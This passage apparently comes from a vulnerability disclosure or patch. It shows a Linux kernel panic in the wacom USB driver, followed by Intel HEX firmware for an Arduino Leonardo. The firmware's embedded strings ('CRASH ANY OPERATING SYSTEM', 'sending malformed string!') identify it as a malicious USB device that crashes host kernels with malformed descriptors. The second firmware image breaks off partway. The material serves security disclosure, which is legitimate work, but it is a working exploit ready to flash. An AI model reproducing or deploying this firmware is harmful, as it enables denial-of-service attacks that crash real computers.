+[ 35.092021] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
+rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
+[ 35.092021] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
+[ 35.092021] RIP: 0010:[] []
+wacom_probe+0x2b6/0xec0 [wacom]
+[ 35.092021] RSP: 0018:ffff88000bd23b58 EFLAGS: 00010286
+[ 35.092021] RAX: 0000000000000000 RBX: ffff88000c525800 RCX: ffff88000bd23ba8
+[ 35.092021] RDX: 0000000000000022 RSI: 0000000000000000 RDI: ffff88000f508692
+[ 35.092021] RBP: ffff88000bd23be0 R08: ffff88000bd72553 R09: 0000000000000064
+[ 35.092021] R10: 0000000000000064 R11: ffffffff810020d8 R12: ffff88000bcd0090
+[ 35.092021] R13: ffff88000bcd0000 R14: ffff88000f508bc8 R15: ffff88000bd72400
+[ 35.092021] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
+knlGS:0000000000000000
+[ 35.092021] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
+[ 35.092021] CR2: 0000000000000038 CR3: 000000000d6a6000
CR4:
+00000000000006f0
+[ 35.092021] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
+0000000000000000
+[ 35.092021] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
+[ 35.092021] Stack:
+[ 35.092021] ffff88000bd23bb0 0000000065aed7a7 ffff88000bcd0090
+0000000000000004
+[ 35.092021] ffff88000bcd0138 0000000000000202 0000000000000001
+0000000000000246
+[ 35.092021] 0000000000000000 ffff88000bd23be0 0000000000000202
+0000000065aed7a7
+[ 35.092021] Call Trace:
+[ 35.092021] [] usb_probe_interface+0x1c4/0x2f0
+[ 35.092021] [] driver_probe_device+0x87/0x390
+[ 35.092021] [] __driver_attach+0x93/0xa0
+[ 35.092021] [] ? __device_attach+0x40/0x40
+[ 35.092021] [] bus_for_each_dev+0x73/0xc0
+[ 35.092021] [] driver_attach+0x1e/0x20
+[ 35.092021] [] bus_add_driver+0x200/0x2d0
+[ 35.092021] [] driver_register+0x64/0xf0
+[ 35.092021] [] usb_register_driver+0x82/0x160
+[ 35.092021] [] ? 0xffffffffa03a3fff
+[ 35.092021] [] wacom_driver_init+0x1e/0x1000 [wacom]
+[ 35.092021] [] do_one_initcall+0xb8/0x230
+[ 35.092021] [] load_module+0x133e/0x1b40
+[ 35.092021] [] ? ddebug_proc_write+0xf0/0xf0
+[ 35.092021] [] ?
copy_module_from_fd.isra.42+0x53/0x150
+[ 35.092021] [] SyS_finit_module+0xa6/0xd0
+[ 35.092021] [] system_call_fastpath+0x16/0x1b
+[ 35.092021] Code: 05 01 00 00 41 8b 76 0c 49 8b 7e 10 48 8d 4d c8 ba 21 00
+00 00 e8 cb 2c 07 e1 85 c0 74 24 49 8b 46 18 48 8d 4d c8 ba 22 00 00 00 <8b>
+70 38 48 8b 78 30 e8 ae 2c 07 e1 85 c0 41 89 c6 0f 85 b2 07
+[ 35.092021] RIP [] wacom_probe+0x2b6/0xec0 [wacom]
+[ 35.092021] RSP
+[ 35.092021] CR2: 0000000000000038
+[ 35.492030] ---[ end trace b239663354a1c556 ]---
+[ 35.497540] Kernel panic - not syncing: Fatal exception
+[ 35.498503] drm_kms_helper: panic occurred, switching back to text console
+
+Arduino Leonardo Firmware #1:
+
+:100000000C94A8000C94C5000C94C5000C94C50079
+:100010000C94C5000C94C5000C94C5000C94C5004C
+:100020000C94C5000C94C5000C94C2050C942D04CE
+:100030000C94C5000C94C5000C94C5000C94C5002C
+:100040000C94C5000C94C5000C94C5000C94C5001C
+:100050000C94C5000C94C5000C94C5000C940C02C3
+:100060000C94C5000C94C5000C94C5000C94C500FC
+:100070000C94C5000C94C5000C94C5000C94C500EC
+:100080000C94C5000C94C5000C94C5000C94C500DC
+:100090000C94C5000C94C5000C94C5000C94C500CC
+:1000A0000C94C5000C94C5000C94C50009030C0306
+:1000B000FF0203032D032D032D0310031403180364
+:1000C0001E0322032D0328030000000200080E0077
+:1000D00000030401000B000000000000000000000D
+:1000E00000000000000004080201104080401020C1
+:1000F00040804080080204018040201002011080EE
+:100100001020404004040404040304050202020217
+:1001100004030202020206060606060604040202A0
+:100120000204000000002300260029002C002F00FC
+:1001300000000000250028002B002E0031000000E8
+:100140000000240027002A002D00300000C180811B
+:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
+:10016000B1E0E0EDF3E102C005900D92A436B107D5
+:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
+:10018000E1F70E94C8000C9402070C940000089547
+:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
+:1001A000DEBF0FBECDBF0E949F020E94C70060E06D
+:1001B00083E00E942E0361E087E00E942E0361E04D
+:1001C00088E00E942E030E9457067E012AE9E20E73
+:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93F90168 +:1002C0009082E4E0D9011196EC93F901DC01292D2B +:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB +:1002E0001B96FC93EE931A971D96BC92AE921C97A8 +:1002F0001183008373836283558344830C521109F5 +:100300002CE0F80111922A95E9F721E0D80119961D +:100310002C931997FE01E059FF4F01900D929A948A +:10032000E1F7F8019387828761E088E00E94670324 +:100330008BE492E00E94630688E892E00E946306E4 +:1003400087EC92E00E94630686E093E00E946306D9 +:1003500082E493E00E9463068FE793E00E946306C5 +:1003600084EA93E00E9463068BEE93E00E946306AA +:1003700083E00E949D03892B09F047C05E01F3E2F0 +:10038000AF0EB11C8824839482E1982E84E194E01E +:100390000E946306BF92AF92DF92CF92FF92EF92DC +:1003A0001F928F921F930F932DB73EB722513109A1 +:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6 +:1003C000FE01FB96892D01900D928A95E1F78DE64D +:1003D00095E00E94010668E873E180E090E00E94E9 +:1003E00079028DE695E00E944C0660E087E00E946D +:1003F000670368E873E180E090E00E9479020FB63D +:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0 +:1004100090E00E947902ACCF1F920F920FB60F921C +:1004200011242F933F938F939F93AF93BF9380910A +:10043000650590916605A0916705B09168053091BA +:10044000640523E0230F2D3720F40196A11DB11D73 +:1004500005C026E8230F0296A11DB11D2093640557 +:100460008093650590936605A0936705B093680532 +:100470008091690590916A05A0916B05B0916C051A +:100480000196A11DB11D8093690590936A05A09303 
+:100490006B05B0936C05BF91AF919F918F913F9188 +:1004A0002F910F900FBE0F901F9018953FB7F894A3 +:1004B0008091690590916A05A0916B05B0916C05DA +:1004C00026B5A89B05C02F3F19F00196A11DB11DAF +:1004D0003FBF6627782F892F9A2F620F711D811DCC +:1004E000911D42E0660F771F881F991F4A95D1F72B +:1004F0000895CF92DF92EF92FF92CF93DF936B013B +:100500007C010E945602EB01C114D104E104F10404 +:1005100079F00E9456026C1B7D0B683E7340A0F37D +:1005200081E0C81AD108E108F108C851DC4FECCFCE +:10053000DF91CF91FF90EF90DF90CF900895789466 +:1005400084B5826084BD84B5816084BD85B58260D8 +:1005500085BD85B5816085BDEEE6F0E08081816076 +:100560008083E1E8F0E01082808182608083808176 +:1005700081608083E0E8F0E0808181608083E1E950 +:10058000F0E0808182608083808181608083E0E907 +:10059000F0E0808181608083E1ECF0E08081846024 +:1005A0008083808182608083808181608083E3ECAE +:1005B000F0E0808181608083E0ECF0E08081826007 +:1005C0008083E2ECF0E0808181608083EAE7F0E004 +:1005D000808184608083808182608083808181606B +:1005E0008083808180688083089590E0FC0131974A +:1005F000EE30F10590F5EA5AFF4F0C94A90980916D +:1006000080008F7703C0809180008F7D8093800071 +:10061000089584B58F7702C084B58F7D84BD089519 +:10062000809190008F7707C0809190008F7D03C0EC +:1006300080919000877F8093900008958091C00002 +:100640008F7703C08091C0008F7D8093C000089594 +:100650008091C200877F8093C2000895CF93DF937B +:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A +:100670008491882349F190E0880F991FFC01E25C86 +:10068000FE4FA591B491805D9E4FFC01C591D49120 +:100690009FB7611108C0F8948C91209582238C93A8 +:1006A000888182230AC0623051F4F8948C91322FF1 +:1006B000309583238C938881822B888304C0F8949F +:1006C0008C91822B8C939FBFDF91CF9108950F93D4 +:1006D0001F93CF93DF931F92CDB7DEB7282F30E063 +:1006E000F901E853FF4F8491F901EA51FF4F14914A +:1006F000F901EC5FFE4F04910023C9F0882321F03B +:1007000069830E94F5026981E02FF0E0EE0FFF1F80 +:10071000E05DFE4FA591B4919FB7F8948C91611163 +:1007200003C01095812301C0812B8C939FBF0F9034 +:10073000DF91CF911F910F910895CF93DF93282FD1 +:1007400030E0F901E853FF4F8491F901EA51FF4F7E 
+:10075000D491F901EC5FFE4FC491CC2391F081114B +:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52 +:10077000A591B4912C912D2381E090E021F480E0AB +:1007800002C080E090E0DF91CF910895615030F099 +:100790002091F100FC0120830196F8CF289884E68F +:1007A00080937D0508951092E900109271051092D2 +:1007B000700590936F0580936E050895FF920F93D7 +:1007C0001F93CF93DF93F82E8B01EA01BA01C80182 +:1007D0000E94A406F80120E030E08EEF2C173D07C0 +:1007E00091F1F7FE02C0A49101C0A0816091700553 +:1007F0007091710540916E0550916F0564177507F2 +:10080000ACF49091E8009570E1F39091E80092FDCE +:100810001CC0A093F100A0917005B09171051196D4 +:10082000AF73BB27AB2B11F48093E800A091700548 +:10083000B09171051196B0937105A09370052F5F6B +:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1 +:10085000CF911F910F91FF9008951F920F920FB6A5 +:100860000F9211246F927F928F929F92AF92BF92BC +:10087000CF92DF92EF92FF920F931F932F933F93AC +:100880004F935F936F937F938F939F93AF93BF9398 +:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1 +:1008A000CDBF1092E9008091E80083FF46C168E067 +:1008B000CE010A960E94C60382EF8093E8009A85D3 +:1008C00097FF05C08091E80080FFFCCF03C08EEF4A +:1008D0008093E800892F807609F023C18B858111F0 +:1008E00005C01092F1001092F10020C1282F2D7F39 +:1008F000213009F41BC1853049F48091E80080FF64 +:10090000FCCF8C8580688093E30010C1863009F0AD +:10091000E1C02D8508891989223009F0B3C0EC8423 +:100920008E2D90E020917305309174058217930706 +:100930000CF09FC00E94D3031F92EF928DE394E0CE +:100940009F938F930E9481068CE0E89E7001112492 +:10095000E0917505F0917605EE0DFF1D89E0DE0151 +:10096000119601900D928A95E1F7C8010E94D30378 +:1009700049E050E0BE016F5F7F4F80E00E94DE03E0 +:100980000F900F900F900F90C12CD12C612C712CD7 +:1009900033E7A32E34E0B32E4AEA842E44E0942EAB +:1009A000E0917505F0917605EE0DFF1D818590E0D3 +:1009B000681679060CF0BAC07F926F92BF92AF9220 +:1009C0000E948106E0917505F0917605EE0DFF1D00 +:1009D000628573856C0D7D1D49E050E080E00E94CA +:1009E000DE030F900F900F900F9000E010E0E09169 +:1009F0007505F0917605EE0DFF1D0284F385E02D5F +:100A0000EC0DFD1D818590E0081719075CF51F931B 
+:100A10000F939F928F920E948106E0917505F0914D +:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16 +:100A3000C801880F991FA485B585A80FB91F4D91CE +:100A40005C910284F385E02DE80FF91F60817181CC +:100A500080E00E94DE030F5F1F4F0F900F900F90FA +:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0 +:100A700097CF8FED94E09F938F930E9481060F9004 +:100A80000F9058C0C8012A8B0E94D3032A892130B5 +:100A9000C1F0233009F04EC08C851F928F9389EFEF +:100AA00094E09F938F930E94810642E050E062E8B9 +:100AB00071E080E00E94DE030F900F900F900F9086 +:100AC00035C04091000150E060E071E080E00E949C +:100AD000DE032CC0873071F1883021F481E08093EF +:100AE000F10024C0893011F5937021F5EDE4F1E0B7 +:100AF00081E021E096E38093E9002093EB003491BC +:100B00003093EC009093ED008F5F3196843099F72D +:100B10008EE78093EA001092EA008C85809372053C +:100B200005C0888999890E94D30304C08EEF809301 +:100B3000E80003C081E28093EB0062960FB6F89460 +:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F +:100B5000AF919F918F917F916F915F914F913F9155 +:100B60002F911F910F91FF90EF90DF90CF90BF904A +:100B7000AF909F908F907F906F900F900FBE0F90CF +:100B80001F9018951F920F920FB60F9211248F93FA +:100B90009F938091E1001092E10083FF0FC01092BB +:100BA000E90091E09093EB001092EC0092E39093B7 +:100BB000ED001092720598E09093F00082FF1AC049 +:100BC00080917E05882339F080917E058150809345 +:100BD0007E05882369F080917D05882359F08091F6 +:100BE0007D05815080937D05811104C0289A02C043 +:100BF0005D9AF1CF9F918F910F900FBE0F901F9034 +:100C00001895CF93DF93CDB7DEB782E1FE0135961D +:100C1000A0E0B1E001900D928A95E1F78F89988D5F +:100C20009093760580937505898D9A8D90937405C0 +:100C3000809373058B8D9C8D90937C0580937B05B1 +:100C40008D8D9E8D90937A05809379058F8D98A1D7 +:100C500090937805809377051092720581E08093D8 +:100C6000D70080EA8093D80082E189BD09B400FEF4 +:100C7000FDCF61E070E080E090E00E94790280E9C1 +:100C80008093D8008CE08093E2001092E000559AA7 +:100C9000209ADF91CF91089581E08093E00008953C +:100CA0009091C80095FFFCCF8093CE0008951092DC +:100CB000CD0087E68093CC0088E18093C9008EE068 +:100CC0008093CA0008950F931F93CF93DF93EC0195 
+:100CD0008C01FE0101900020E9F73197EC1BFD0B20 +:100CE000C8018C1B9D0B8E179F0730F4F801819172 +:100CF0008F010E945006EDCFDF91CF911F910F9190 +:100D00000895CF93DF93CDB7DEB7DA950FB6F89499 +:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193 +:100D20009F0160E071E0CE0101960E940507CE01AF +:100D300001960E946306D3950FB6F894DEBF0FBEEE +:100D4000CDBFDF91CF9108958F929F92AF92BF92C6 +:100D5000CF92DF92EF92FF920F931F93CF93DF9387 +:100D600000D0CDB7DEB75B0122E535E03F932F938E +:100D700089839A830E9481068981882E9A81992E7F +:100D80000F900F9000E010E08EE5E82E85E0F82E41 +:100D900091E1C92E94E0D92E0A151B05E4F4F40163 +:100DA00081914F0190E09F938F93FF92EF920E9469 +:100DB00081060F5F1F4FC8018F7099270F900F900A +:100DC0000F900F90892B41F7DF92CF920E948106FE +:100DD0000F900F90E1CF81E194E09F938F930E9459 +:100DE00081060F900F900F900F90DF91CF911F9180 +:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA +:100E00008F900895F8940C94E609AEE0B0E0EBE022 +:100E1000F7E00C94BD098C01CA0146E04C831A83AB +:100E2000098377FF02C060E070E8615071097E833A +:100E30006D83A901BC01CE0101960E9431074D814D +:100E40005E8157FD0AC02F813885421753070CF485 +:100E50009A01F801E20FF31F10822E96E4E00C9441 +:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E +:100E70006B018A01FC0117821682838181FFBDC14B +:100E8000CE0101964C01F7019381F60193FD859106 +:100E900093FF81916F01882309F4ABC1853239F446 +:100EA00093FD859193FF81916F01853229F4B701FC +:100EB00090E00E941909E7CF512C312C20E020321C +:100EC000A0F48B3269F030F4803259F0833269F447 +:100ED00020612CC08D3239F0803339F4216026C076 +:100EE0002260246023C0286021C027FD27C030ED88 +:100EF000380F3A3078F426FF06C0FAE05F9E300DD6 +:100F00001124532E13C08AE0389E300D1124332E45 +:100F100020620CC08E3221F426FD6BC1206406C015 +:100F20008C3611F4206802C0883641F4F60193FD36 +:100F3000859193FF81916F018111C1CF982F9F7D82 +:100F40009554933028F40C5F1F4FFFE3F9830DC0D5 +:100F5000833631F0833771F0833509F05BC022C0EE +:100F6000F801808189830E5F1F4F44244394512CE4 +:100F7000540115C03801F2E06F0E711CF801A08019 +:100F8000B18026FF03C0652D70E002C06FEF7FEFD8 
+:100F9000C5012C870E940E092C0183012C852F7717 +:100FA000222E17C03801F2E06F0E711CF801A080EC +:100FB000B18026FF03C0652D70E002C06FEF7FEFA8 +:100FC000C5012C870E9403092C012C852068222E44 +:100FD000830123FC1BC0832D90E048165906B0F412 +:100FE000B70180E290E00E9419093A94F4CFF5012C +:100FF00027FC859127FE81915F01B70190E00E9457 +:10100000190931103A94F1E04F1A51084114510472 +:1010100071F7E5C0843611F0893639F5F80127FFFC +:1010200007C060817181828193810C5F1F4F08C06E +:1010300060817181882777FD8095982F0E5F1F4F03 +:101040002F76B22E97FF09C0909580957095619587 +:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF +:101060000E944B09A82EA81844C0853729F42F7E6A +:10107000B22E2AE030E025C0F22FF97FBF2E8F3646 +:10108000C1F018F4883579F0B4C0803719F088378A +:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA +:1010A0008460B82E09C024FF0AC09F2F9660B92E15 +:1010B00006C028E030E005C020E130E002C020E1B9 +:1010C00032E0F801B7FE07C06081718182819381AF +:1010D0000C5F1F4F06C06081718180E090E00E5F61 +:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3 +:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0 +:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8 +:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E +:10112000F11D8081803311F4297E09C022FF06C0A1 +:101130007394739404C0822F867809F0739423FD0E +:1011400013C020FF06C05A2C731418F4530C571800 +:10115000732C731468F4B70180E290E02C870E942E +:10116000190973942C85F5CF731410F4371801C046 +:10117000312C24FF12C0B70180E390E02C870E943D +:1011800019092C8522FF17C021FF03C088E590E0D4 +:1011900002C088E790E0B7010CC0822F867859F032 +:1011A00021FD02C080E201C08BE227FD8DE2B70184 +:1011B00090E00E941909A51438F4B70180E390E08B +:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F +:1011D0008081B70190E00E941909A110F5CF33205A +:1011E00009F451CEB70180E290E00E9419093A94C7 +:1011F000F6CFF7018681978102C08FEF9FEF2C9683 +:10120000E2E10C94CB09FC010590615070400110A3 +:10121000D8F7809590958E0F9F1F0895FC0161501F +:10122000704001900110D8F7809590958E0F9F1F08 +:1012300008950F931F93CF93DF93182F092FEB017E +:101240008B8181FD03C08FEF9FEF20C082FF10C014 
+:101250004E815F812C813D81421753077CF4E881E8 +:10126000F9819F012F5F3F4F39832883108306C088 +:10127000E885F985812F0995892B29F72E813F81F2 +:101280002F5F3F4F3F832E83812F902FDF91CF9190 +:101290001F910F910895FA01AA27283051F12031AA +:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA +:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C +:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A +:1012D000711D811D911DA11D20D009F468943F91BD +:1012E0002AE0269F11243019305D3193DEF6CF01BC +:1012F0000895462F4770405D4193B3E00FD0C9F782 +:10130000F6CF462F4F70405D4A3318F0495D31FDEE +:101310004052419302D0A9F7EACFB4E0A695979541 +:10132000879577956795BA95C9F700976105710517 +:1013300008959B01AC010A2E069457954795379561 +:101340002795BA95C9F7620F731F841F951FA01DBB +:101350000895EE0FFF1F0590F491E02D09942F9250 +:101360003F924F925F926F927F928F929F92AF9235 +:10137000BF92CF92DF92EF92FF920F931F93CF9382 +:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19 +:101390000FBECDBF09942A88398848885F846E843F +:1013A0007D848C849B84AA84B984C884DF80EE8089 +:1013B000FD800C811B81AA81B981CE0FD11D0FB692 +:1013C000F894DEBF0FBECDBFED010895F894FFCFB6 +:1013D0001201000200000040AD0BEFBE000101024F +:1013E000000122034200610064002000420041002D +:1013F00042004500250078002500780025006E0099 +:101400002500700018034200410044002000430002 +:101410003000460046004500450021001201000250 +:10142000000000406A0503000001010203010902F7 +:10143000270001010000FA0705810304040C0705D9 +:10144000010204000C0705820104000C07000700DC +:101450000700480100500072006F006C00690066D0 +:101460000069006300000A550000006BFD180A00C7 +:10147000809F0AB901312B940A8101128946001319 +:10148000000257028B0A5E0AF80A5F01F21201009D +:1014900002010000400D055702000101020301B9DD +:1014A0000A0100F80A5F0A810A220342006100640F +:1014B0000020004200410042004500250078002540 +:1014C00000780025006E00250070001803420041DE +:1014D000004400200043003000460046004500451F +:1014E00000210012010002010000400D055702001A +:1014F000010102030109040000030100000003F2DE +:101500000AEC0A0902270001010000FA01AB0A09EE 
+:101510000400000301000000090200202020202018 +:101520005F5F5F5F5F5F5F5F2020202020202020C3 +:1015300020202020202020202020202020202020AB +:1015400020205F5F5F5F5F205F5F20205F202020A3 +:101550002020205F5F0A0D00202020202F205F5FC9 +:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7 +:101570005F5F20205F5F5F5F5F20202020202F20A3 +:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7 +:10159000202F5F5F0A0D002020202F202F202020E9 +:1015A0002F205F5F205C2F205F5F20602F205F5F18 +:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E +:1015C000205C2F205F5F2F202F205F5F5F2F202F59 +:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D +:1015E0002F202F202F202F5F2F202F202F5F2F2005 +:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4 +:101600002F202F5F2F202F202F5F5F2F202C3C0AB1 +:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B +:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63 +:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8 +:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048 +:101650003C3C2043485241534820414E59204F5072 +:1016600045524154494E472053595354454D203E0D +:101670003E0A0D00203C3C202863292053657267F8 +:10168000656A20536368756D696C6F20323031353F +:101690002C204F70656E536F7572636520536563C0 +:1016A00075726974792052616C66205370656E6E34 +:1016B0006562657267203E3E0A0D000A3E3E20507C +:1016C0007265737320627574746F6E20746F20730B +:1016D0007461727420657865637574696F6E2E2EFF +:1016E0002E0A0D005B44454255475D2045786563F1 +:1016F000757465207061796C6F616420300A0D002B +:10170000526563762D446174613A0A0D005B44456D +:101710004255475D200953656E6420436F6E6669CC +:101720006775726174696F6E446573637269707412 +:101730006F720928696E6465783A2569292E2E2E04 +:101740000D0A005B44454255475D200953656E64B0 +:1017500020496E74657266616365204465736372C7 +:101760006970746F720928696E7465726661636569 +:101770003A2569292E2E2E0D0A005B444542554715 +:101780005D200953656E6420456E64706F696E74E8 +:101790002044657363726970746F720928656E64A2 +:1017A000706F696E743A2569292E2E2E0D0A005B22 +:1017B00044454255475D203C3C70616E6963206D35 +:1017C0006F64653F3E3E0D0A005B44454255475DF0 
+:1017D0002009203E3E20537472696E672044657371 +:1017E00063726970746F72207265717565737420AD +:1017F0002D2073656E64696E67206D616C666F7213 +:101800006D656420737472696E67212073657475E9 +:10181000702E7756616C75654C203D3D2025690D15 +:101820000A005B48455844554D505D0A0D0025306F +:04183000325820000A +:00000001FF + +Arduino Leonardo Firmware #2: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C2050C942D04CE +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940C02C3 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C50009030C0306 +:1000B000FF0203032D032D032D0310031403180364 +:1000C0001E0322032D0328030000000200080E0077 +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E0EDF3E102C005900D92A436B107D5 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9402070C940000089547 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E949F020E94C70060E06D +:1001B00083E00E942E0361E087E00E942E0361E04D +:1001C00088E00E942E030E9457067E012AE9E20E73 +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF 
+:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93F90168 +:1002C0009082E4E0D9011196EC93F901DC01292D2B +:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB +:1002E0001B96FC93EE931A971D96BC92AE921C97A8 +:1002F0001183008373836283558344830C521109F5 +:100300002CE0F80111922A95E9F721E0D80119961D +:100310002C931997FE01E059FF4F01900D929A948A +:10032000E1F7F8019387828761E088E00E94670324 +:100330008BE492E00E94630688E892E00E946306E4 +:1003400087EC92E00E94630686E093E00E946306D9 +:1003500082E493E00E9463068FE793E00E946306C5 +:1003600084EA93E00E9463068BEE93E00E946306AA +:1003700083E00E949D03892B09F047C05E01F3E2F0 +:10038000AF0EB11C8824839482E1982E84E194E01E +:100390000E946306BF92AF92DF92CF92FF92EF92DC +:1003A0001F928F921F930F932DB73EB722513109A1 +:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6 +:1003C000FE01FB96892D01900D928A95E1F78DE64D +:1003D00095E00E94010668E873E180E090E00E94E9 +:1003E00079028DE695E00E944C0660E087E00E946D +:1003F000670368E873E180E090E00E9479020FB63D +:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0 +:1004100090E00E947902ACCF1F920F920FB60F921C +:1004200011242F933F938F939F93AF93BF9380910A +:10043000650590916605A0916705B09168053091BA +:10044000640523E0230F2D3720F40196A11DB11D73 +:1004500005C026E8230F0296A11DB11D2093640557 +:100460008093650590936605A0936705B093680532 +:100470008091690590916A05A0916B05B0916C051A +:100480000196A11DB11D8093690590936A05A09303 +:100490006B05B0936C05BF91AF919F918F913F9188 +:1004A0002F910F900FBE0F901F9018953FB7F894A3 +:1004B0008091690590916A05A0916B05B0916C05DA +:1004C00026B5A89B05C02F3F19F00196A11DB11DAF +:1004D0003FBF6627782F892F9A2F620F711D811DCC +:1004E000911D42E0660F771F881F991F4A95D1F72B +:1004F0000895CF92DF92EF92FF92CF93DF936B013B 
+:100500007C010E945602EB01C114D104E104F10404 +:1005100079F00E9456026C1B7D0B683E7340A0F37D +:1005200081E0C81AD108E108F108C851DC4FECCFCE +:10053000DF91CF91FF90EF90DF90CF900895789466 +:1005400084B5826084BD84B5816084BD85B58260D8 +:1005500085BD85B5816085BDEEE6F0E08081816076 +:100560008083E1E8F0E01082808182608083808176 +:1005700081608083E0E8F0E0808181608083E1E950 +:10058000F0E0808182608083808181608083E0E907 +:10059000F0E0808181608083E1ECF0E08081846024 +:1005A0008083808182608083808181608083E3ECAE +:1005B000F0E0808181608083E0ECF0E08081826007 +:1005C0008083E2ECF0E0808181608083EAE7F0E004 +:1005D000808184608083808182608083808181606B +:1005E0008083808180688083089590E0FC0131974A +:1005F000EE30F10590F5EA5AFF4F0C94A90980916D +:1006000080008F7703C0809180008F7D8093800071 +:10061000089584B58F7702C084B58F7D84BD089519 +:10062000809190008F7707C0809190008F7D03C0EC +:1006300080919000877F8093900008958091C00002 +:100640008F7703C08091C0008F7D8093C000089594 +:100650008091C200877F8093C2000895CF93DF937B +:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A +:100670008491882349F190E0880F991FFC01E25C86 +:10068000FE4FA591B491805D9E4FFC01C591D49120 +:100690009FB7611108C0F8948C91209582238C93A8 +:1006A000888182230AC0623051F4F8948C91322FF1 +:1006B000309583238C938881822B888304C0F8949F +:1006C0008C91822B8C939FBFDF91CF9108950F93D4 +:1006D0001F93CF93DF931F92CDB7DEB7282F30E063 +:1006E000F901E853FF4F8491F901EA51FF4F14914A +:1006F000F901EC5FFE4F04910023C9F0882321F03B +:1007000069830E94F5026981E02FF0E0EE0FFF1F80 +:10071000E05DFE4FA591B4919FB7F8948C91611163 +:1007200003C01095812301C0812B8C939FBF0F9034 +:10073000DF91CF911F910F910895CF93DF93282FD1 +:1007400030E0F901E853FF4F8491F901EA51FF4F7E 